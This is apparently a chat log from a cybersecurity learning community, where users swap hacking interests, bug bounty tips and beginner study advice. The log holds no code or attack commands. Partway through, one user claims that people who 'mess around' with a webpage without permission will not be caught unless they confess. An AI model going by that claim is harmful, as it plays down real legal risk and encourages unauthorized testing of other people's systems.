anyways what kinda hacking are you into?
Well boxes are mostly web hacking and privilege escalation, and apart from that, I like to mess around with game anticheats, bypass them, hack IOT stuff etc
fringe viper
Well boxes are mostly web hacking and privilege escalation, and apart from that,...
cool
fringe viper
Well boxes are mostly web hacking and privilege escalation, and apart from that,...
youre not into bounties?
lime mirage
Stay safe and follow the law next time, I understand you had good intentions but you always need explicit permission and to verify it ,if theres a bug bounty read policy and scope that's a safe bet
west venture
youre not into bounties?
Sometimes
rancid snow
i thought i was doing the right thing tho
you can be motived to do the right thing but still fuck up. Thats why its strongly encouraged to get a better foundation before trying stuff in the real world, especially since its an extremely thin line between legitimate work and jail time in this field
fringe viper
Stay safe and follow the law next time, I understand you had good intentions but...
yeah imma do that next time
fringe viper
you can be motived to do the right thing but still fuck up. Thats why its strong...
what kinda hacking are you into?
rancid snow
also depending on your jurisdiction, safe harbor laws might be protecting you, in which case youre actually fine but I wouldnt risk it in the future
molten bobcat
west venture
what do you do for work?
I work in IT
fringe viper
I work in IT
tell me more about it
rancid snow
what kinda hacking are you into?
I jump around but lately Ive been diving more into vulnerability research, finding bugs
west venture
tell me more about it
I'd rather not lol. It's quite complicated and embarrassing
fringe viper
I jump around but lately Ive been diving more into vulnerability research, findi...
damnn ,whats some creative bugs youve found or heard of?
fringe viper
I'd rather not lol. It's quite complicated and embarrassing
can i guess?
west venture
also depending on your jurisdiction, safe harbor laws might be protecting you, i...
Realistically, you won't go to prison for these bc nobody has the necessary tech, effort or money to track down a person solely bc they messed around with a webpage.
Unless you go to them and tell them of course
rancid snow
that also
west venture
can i guess?
Okay
west venture
No
fringe viper
the job role?
west venture
Thats the complicated part. I do everything
west venture
Lol
fringe viper
do you own the place you work at?
west venture
No it's a factory
frosty trellis
rando question, did they do an overhaul on the streak system ?
fringe viper
oh
fringe viper
No it's a factory
yeah i got it
west venture
rando question, did they do an overhaul on the streak system ?
Looks like they did an overhaul on a lot of things
fringe viper
No it's a factory
phallus shaped objects factory?
frosty trellis
i know been digging through some of it. but i just noticed reading padges and anwsering question do not provide you with point anymore
west venture
No it produces tea
fringe viper
No it produces tea
ya lost me
west venture
i know been digging through some of it. but i just noticed reading padges and ...
Loll
frosty trellis
can you elaborate on that lol for me. i like to know how to keep my streak alive
alpine pumice
i know been digging through some of it. but i just noticed reading padges and ...
Always been this way. You get 20% of your cubes back when you finish it. How the cubes are distributed is different across all modules. Some only give them back for the final skill assessment, etc.
frosty trellis
sorry seems there is a little confusion. i am not refuring to cubes i am talking about the motivation streak system
west venture
Idk I guess keep learning? I am the one who needs advice lol.
But yeah, keep learning
distant grail
you got advice for someone trying to get into cybersecurity or bug bounties?
Do the boring stuff, they are needed
frosty trellis
that earns you badges
fringe viper
Do the boring stuff, they are needed
like what? theory?
distant grail
like what? theory?
Mostly, people love to skip over text, or some fundementals or basics but later you will think back at that moment
azure remnant
I named my wifi hotspot North korean spying surveillence
jagged storm
you got advice for someone trying to get into cybersecurity or bug bounties?
Stick to bug bounty programs, or vdp if you just want cred
fringe viper
Stick to bug bounty programs, or vdp if you just want cred
well idk i get lost looking at a real target
like i dont know where to look
distant grail
well idk i get lost looking at a real target
Practice makes perfect, dive deep into subjects, return back, fail, learn about vulns, fail, etc etc
fringe viper
picking a particular endpoint is coool but i wish i knew what to probe into just by looking at it
jagged storm
well idk i get lost looking at a real target
Then you need to learn, instead of jumping ahead. Use the academy
distant grail
picking a particular endpoint is coool but i wish i knew what to probe into jus...
There is always so much to learn
If you want to do bugbounty
Pick a vuln you want to learn, don't try to master them all at once
I've been there, doing a little bit of idor, little bit of xss, little bit of sqli etc etc will make you learn nothing
fringe viper
There is always so much to learn
whats like a bounty youre proud of?
distant grail
None sadly enough, I'm not a star with bounties
Totally different methodology etc then what I'm used to
fringe viper
Totally different methodology etc then what I'm used to
what do you do for work?